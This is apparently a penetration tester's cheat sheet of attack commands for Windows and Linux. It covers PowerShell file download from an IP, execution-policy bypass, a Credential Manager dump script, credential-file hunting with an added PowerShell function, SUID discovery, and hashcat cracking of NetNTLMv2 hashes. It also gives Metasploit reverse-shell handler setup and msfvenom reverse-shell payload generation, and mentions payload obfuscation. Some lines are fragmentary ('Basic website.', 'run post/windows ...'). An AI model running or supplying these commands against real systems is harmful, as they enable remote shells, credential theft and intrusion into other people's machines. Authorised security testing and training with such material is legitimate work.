Run PowerShell from cmd (-noexit keeps the window open after a script finishes):
powershell.exe -noexit
Download a file with PowerShell (first form runs from cmd, second from an existing PowerShell session; replace http://IP with the full URL of the file):
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://IP', 'file_name')"
Invoke-WebRequest -Uri $url -OutFile $output
Allow PowerShell to run scripts for the current user (no admin rights needed for the CurrentUser scope):
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Credential Manager dump script (also in this GitHub repository as cm.ps1; -ShoCred shows the stored credentials, -All includes every entry):
.\cm.ps1 -ShoCred -Target 'localhost' -All
Find credential and config files (run from the directory you want to search; "heslo" is Czech for "password"; *.kdb* matches KeePass databases):
dir /s *pass* *cred* *vnc* *.config*
findstr /si heslo *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt
dir /s *.kdb*
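The searches above as one PowerShell function, combining the filename hunt (dir /s) and the content hunt (findstr /si) into a single listing. This is an added example, not code from the original cheat sheet or from any of the linked scripts; the default patterns, keywords and search root are assumptions and should be tuned per engagement.

```powershell
# Added example: credential-artifact hunt. Defaults (patterns, keywords, root)
# are assumptions, not part of the original page.
function Find-CredentialArtifacts {
    param(
        [string]$Root = 'C:\',
        # file names that suggest secrets (equivalent of: dir /s *pass* *cred* *vnc* *.config* *.kdb*)
        [string[]]$NamePatterns = @('*pass*', '*cred*', '*vnc*', '*.config', '*.kdb', '*.kdbx'),
        # file types whose contents are worth grepping (equivalent of: findstr /si ... *.xml *.ini *.txt)
        [string[]]$ContentExtensions = @('*.xml', '*.ini', '*.txt'),
        # "heslo" is Czech for "password"; add other languages as needed
        [string[]]$Keywords = @('password', 'passwd', 'heslo')
    )

    # 1. Hits by file name. -Force includes hidden files; -Include needs -Recurse to apply.
    $byName = Get-ChildItem -Path $Root -Recurse -Force -File -Include $NamePatterns -ErrorAction SilentlyContinue |
        Select-Object @{ n = 'Type';  e = { 'Name' } },
                      FullName,
                      @{ n = 'Match'; e = { $_.Name } }

    # 2. Hits by content. Select-String is case-insensitive by default and accepts an
    #    array of patterns; -SimpleMatch treats them as literals, not regexes.
    $byContent = Get-ChildItem -Path $Root -Recurse -Force -File -Include $ContentExtensions -ErrorAction SilentlyContinue |
        Select-String -Pattern $Keywords -SimpleMatch -ErrorAction SilentlyContinue |
        Select-Object @{ n = 'Type';     e = { 'Content' } },
                      @{ n = 'FullName'; e = { $_.Path } },
                      @{ n = 'Match';    e = { "$($_.LineNumber): $($_.Line.Trim())" } }

    # Wrap in @() so an empty result on either side still concatenates cleanly.
    @($byName) + @($byContent) | Sort-Object Type, FullName, Match -Unique
}

# Usage (searching a single profile is far quicker than C:\ and is usually where the hits are):
Find-CredentialArtifacts -Root "$env:USERPROFILE" | Format-Table -AutoSize
```

Redirect the output to Export-Csv when you need to keep evidence; expect a lot of noise from *.config under Program Files, which is why the search root is a parameter rather than always C:\.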
Switching into a directory whose name cannot be typed (non-UTF-8 / odd encoding): collect the full paths into an array and cd by index (replace x with the index of the directory from the listing):
$Files = Get-ChildItem -Path .\ -Directory | ForEach-Object {$_.FullName }
cd $Files[x]
Query, stop and start services (stopping or starting usually needs admin rights):
PS C:\> Get-Service -Name "iisadmin"
PS C:\> Stop-Service -Name "iisadmin"
PS C:\> Start-Service -Name "iisadmin"
Basic website.
Find SUID binaries on Linux (candidates for privilege escalation; errors from unreadable directories are discarded):
find / -perm -4000 2>/dev/null
Hashcat (crack captured NetNTLMv2 hashes with a wordlist plus rules):
hashcat -m 5600 -a 0 SMBv2-NTLMv2.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
-m 5600 - hash type (5600 is NetNTLMv2, e.g. from Responder)
-a 0 - attack mode (0 means dictionary)
-r - rule set applied to each dictionary word
--force - ignore hashcat's warnings (e.g. missing OpenCL runtime); drop it when the setup is sane
Generic handler for a reverse shell (LHOST/LPORT must match the values baked into the payload):
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST <Your IP Address>
set LPORT <Your Port to Connect On>
run
Payloads - reverse shell (msfvenom):
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
<language> is an output format such as c, python or ps1 (for embedding the shellcode in your own loader); -f can be skipped, in which case msfvenom emits the raw payload bytes.
Post-exploitation (new): Metasploit post modules from an open session, e.g.
run post/windows ...
Payload obfuscation (link) - the code can easily be optimised, the embedded payload changed, etc.
- Thanks LukaSikic. Code also here as reverse.py.